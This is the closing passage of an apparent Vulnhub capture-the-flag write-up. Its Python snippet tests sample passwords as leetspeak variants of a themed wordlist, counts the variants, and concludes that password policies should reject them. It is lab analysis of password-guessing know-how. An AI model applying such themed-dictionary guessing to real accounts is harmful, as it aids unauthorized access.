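# Constructed dictionary: themed words a challenge like this one would suggest.
THEMED_WORDS = ["hackers", "zerocool", "gibson"]

if __name__ == "__main__":
    for pw in ("Z3r0K00l", "zerocool", "correct horse battery staple"):
        base = check_password(pw, THEMED_WORDS)
        if base:
            bits = math.log2(variant_count(base))
            print(f"{pw}: variant of '{base}' ({variant_count(base)} candidates, ~{bits:.1f} bits added)")
        else:
            print(f"{pw}: not a simple variant of a themed word")
```

For zerocool the whole variant space is 2592 candidates, about 11 bits on top of a word that is itself a one-in-a-few-hundred guess given the theme; the same arithmetic is why a password policy should reject such variants rather than count the digits as strength.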

Nice one, it was very original, I loved it. Thanks to Knightmare for the VM and to Vulnhub for hosting it. For any questions or comments, please do not hesitate to leave a comment.